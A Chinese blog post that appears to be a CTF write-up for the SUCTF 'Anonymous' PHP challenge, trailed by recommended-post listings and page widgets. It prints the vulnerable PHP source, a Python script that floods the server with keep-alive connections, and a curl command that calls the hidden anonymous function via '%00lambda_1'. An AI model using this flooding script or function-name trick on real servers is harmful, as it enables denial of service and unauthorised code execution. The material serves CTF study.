CG 的 Anonymous

最新推荐文章于 2021-10-22 21:03:12 发布
最新推荐文章于 2021-10-22 21:03:12 发布
阅读量236 收藏
点赞数
分类专栏: exp 文章标签: cg
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45552960/article/details/103296589
版权

这题好像平台打不开,就百度了一下各位师傅写的wp
好像直接给出了源码
wp大佬的,大佬里面还有大大佬

在这里插入代码片
```<?php

$MY = create_function("","die(`cat flag.php`);");
$hash = bin2hex(openssl_random_pseudo_bytes(32));
eval("function SUCTF_$hash(){"
    ."global \$MY;"
    ."\$MY();"
    ."}");
if(isset($_GET['func_name'])){
    $_GET["func_name"]();
    die();
}
show_source(__FILE__);

直接给出exp

import requests
import socket
import time
from multiprocessing.dummy import Pool as ThreadPool
try:
    requests.packages.urllib3.disable_warnings()
except:
    pass

def run(i):
    while 1:
        HOST='45.76.173.177'
        PORT=23334
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        s.sendall('GET / HTTP/1.1\nHost:web.suctf.asuri.org:81\nConnection: Keep-Alive\n\n')
        # s.close()
        print 'ok'
        time.sleep(0.5)

i = 8
pool = ThreadPool( i )
result = pool.map_async( run,range(i) ).get(0xffff)

然后在linux中执行以下命令

curl -b idlefire "http://45.76.173.177:23334/?func_name=%00lambda_1"

在这里插入图片描述

小 白 渣
关注
专栏目录
Linux内存管理(五十五):shrink_node 详解
私房菜
09-05 1162
在页面回收简介和 kswpd(1)直接页面回收机制:在内核态里调用页面分配接口函数 alloc_pages() 分配物理页面时,由于系统内存短缺,不能满足分配请求,因此内核会直接进入页面回收机制,尝试回收内存来解决当前的燃眉之急,这就是直接页面回收机制。周期性回收内存机制:这是 kswapd 内核线程的工作职责。当内核路径调用 alloc_pages() 分配物理页面时,由于系统内存短缺,没法在低水位情况下分配出内存,因此会唤醒 kswapd 内核线程来异步回收内存。
CSDN前1000名博主
热门推荐
无知人生,记录点滴
05-26 8万+
博主 简介 stpeace 排名:1 原创:2166 粉丝:7180 积分:181660 等级:10stpeace的专栏中国本博客供大家交流,欢迎各抒己见。博文中的内容禁止用 yuanmeng001 排名:2 原创:5286 粉丝:10660 积分:170616 等级:10袁萌专栏无穷小微积分倡导者–北大教授null老师 yjclsx 排名:3 原创:162...
[CTF][SUCTF2019]easysql
凉水的博客
10-22 365
解题思路 1 先尝试可能的注入点 单引号 双引号 数字 字母等等,看界面反应。 最终结果: from union 等关键字被过滤,flag字符串也被过滤。 可以使用堆叠注入。 输入字符串界面无反应,输入数字会返回,1,2,3等也会返回。 限制输入长度。 基本可以确定,是select … from xxx的句式。 但是会对最后一个字符做处理,如1,2,3,会返回1, 2,1 2 方向 把前面的规则理清了不太难,但是如何注入,很费脑筋。 因为from关键字被屏蔽,表名flag字符串也被屏蔽。同时又限制了输入长度
“百度杯”CTF比赛 十月场 Login
drip_big的博客
04-17 1366
“百度杯”CTF比赛 十月场 Login 1 进去就是一个长得还可以的登入界面,查看源码没看到注释,以为没有,开始对其进行sql注入测试,在 burp suite多次尝试,没找到注入点与注入语句。返回的结果只有error。 // test1 test1 这是藏在源码下方需要下移才看得到的注释; 没啥实际意义,两个:可能是账号密码 试一下登入成功 2 返回页面几乎啥也没有,刷新截取报文看看有什...
2019-fafu-ctf非常小的一部分wp
SPS98
04-28 611
Web 签到题 打开题目链接:http://172.31.19.49/web1/ ,给了php代码 即要求用post传入name和password,用弱类型比较,两者不能相等,但是要md5和sha1值一致,所以用数组形式传值。 补:这里利用的是php取数组的MD5和sha1值出现错误,返回null,使两者相等 login1 打开题目链接:http://172.31.19.49/web2/ ...
CGCTF平台web题writeup
test
10-25 1万+
前言 正文 签到题 10pt tips : 这一定是最简单的 连接 恩,key在源代码中 md5 collision 20pt 连接 直接贴出了代码 $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' &amp;amp;amp;&amp;amp;amp; $md51 == $md5...
不得不引起足够重视的anonymous用户!
网络工作室 玖捌网络
09-17 7515
连日的阴雨,使原本炎热的天气突然变得潮湿起来。烦躁的心情也慢慢地平复了下来,像往常一下,借用CuteFtp工具登录自己的VPS,检查一下文件异常。突然之间,几个刺眼的.exe文件呈现在我的眼前,顿时惊出我一身冷汗,下意识到:网站被黑客入侵了。 打开远程桌面连接3389登录,我想一探究竟,Hacker是如何入侵本人的系统呢?在确认网站程序安全无误的情况下,我马上想到了FTP,立即打开FTP日志文件
js生成带log的二维码(qrcodejs)
weixin_30505485的博客
07-22 6万+
github: qrcodejs cdn: http://static.runoob.com/assets/qrcode/qrcode.min.js #qrcode #qrcode margin: 20px // 生成二维码图片 let tmp = document.createElement('div'); let qrcode = new QRCode(tmp, { t...
Linux中进程内存RSS与cgroup内存的RSS统计 - 差异
weixin_34321977的博客
06-08 4666
转载一篇关于进程内存计算和CGROUP内存计算差异的文章 http://hustcat.github.io/memory-usage-in-process-and-cgroup/ 在Linux内核,对于进程的内存使用与Cgroup的内存使用统计有一些相同和不同的地方。 进程的内存统计 一般来说,业务进程使用的内存主要有以下几种情况: (1)用...
cloudteam1
02-11
<link crossorigin="anonymous" media="all" integrity="sha512-mDxZzH7yjJmUSRXSdBXbhMkHBqpP95Kt2uWzy67Jt7t6CG0Q5xNs5JLVPKM84AX6Q/K3GApoCtl+Oe8BE8NllA==" rel="stylesheet" href=... <...
Python程序设计之登陆注册(Login-Register)
QinHsiu的博客
03-15 2438
1.窗体初始化 ①模块导入及窗口初始化 import tkinter import tkinter.messagebox import tkinter.ttk import re #初始化窗体 root=tkinter.Tk() #初始化窗口大小 root["width"]=500 root["height"]=500 #初始化窗口标题 root.title("Login") ②创建文本框和标...
南邮CG-CTF—Web writeup第二部分
Senimo
08-04 1695
南邮CG-CTF—Web writeup第二部分伪装者Header上传绕过SQL注入1pass check起名字真难密码重置php 反序列化SQL Injection综合题systemSQL注入2综合题2密码重制2file_get_contents变量覆盖2注意!!HateITAnonymous 南邮CG-CTF链接 伪装者 Header 上传绕过 SQL注入1 pass check 起名字真难 ...
“百度杯”CTF比赛 十月场 -------Login
大方子
08-01 3352
============================================================= 个人收获: 1.多观察网页的源代码 2.多留意http的访问信息 3.多留意http头参数的变化 4.收获了unserialize,gzuncompress参数的认识 ================================================...
CG-CTF-Web-MYSQL
1stPeak's Blog
06-28 1551
MYSQL 1.题目 2.我们打开题目地址 3.看来有个robots.txt,我们来访问一下,出现下图所示 4.那我们接下来分析代码: <?php if($_GET[id]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS); //连接数据库 mysq...
Anonymous - golang 匿名的妙用
薛昭君的博客
04-05 897
Anonymous - 匿名的妙用匿名结构体 - 数据快读在读取某一些临时数据,然后快速打印的时候,使用匿名函数是相当方便的func ReadData(){ jsonData := []byte(`[ {"Name":"ZhaoJun","Sex":"Male"}, {"Name":"Xishi","Sex":"female"} ]`) var persons
CG-CTF Misc Writeup--Remove Boyfriend
周无争的博客
04-17 1636
最近在刷题,发现这道题竟然没有writeup,只好硬磕。好在出题人比较厚道,没有挖更多的坑,最后解决后还是很有成就感的(小白在进步)。按照题目下载网盘文件:Remove+Boyfriend.pcapng。用wireshark打开,是这样的:可能会有点乱,从头开始看,第5行有条操作命令:CWD /Users/liupc/Desktop/Remove BoyfriendCWD是Raw FTP comm...
2018SUCTF部分wp
Risker
05-28 2954
趁大佬都去打别的比赛,试了试SUCTF,依旧菜的一批,只做出来两道,GG。WEB:Anonymous:简单粗暴给源码,看着这源码好像在哪看过:没错,2017HITCON改的,只不过难度降低了一大截..把有难度的部分都去掉了。wp参考这里按照步骤操作,这道题只需要做最后的步骤,只考了个匿名函数以及apache的Pre-fork模式默认工作模式。拿了orange大大的脚本改个host就去跑吧,linu...
CG-CTF-Web-伪装者
1stPeak's Blog
07-01 1666
伪装者 1.题目 2.点击查看题目 源码没有查看到有价值的东西,根据题目名,我们猜测可能需要x-forwarded-for或client-ip,这里我们就添加一个client-ip,得到flag ...
rossmann_sales_prediction.ipynb
最新发布
09-26
rossmann_sales_prediction.ipynb
anonymous
05-28
在 Spring Security 中,anonymous 是一种访问权限控制方式,用于控制未经过身份验证的用户(即匿名用户)能够访问哪些资源。 使用 anonymous 权限控制方式,可以指定一个或多个 URL 路径,允许匿名用户访问这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值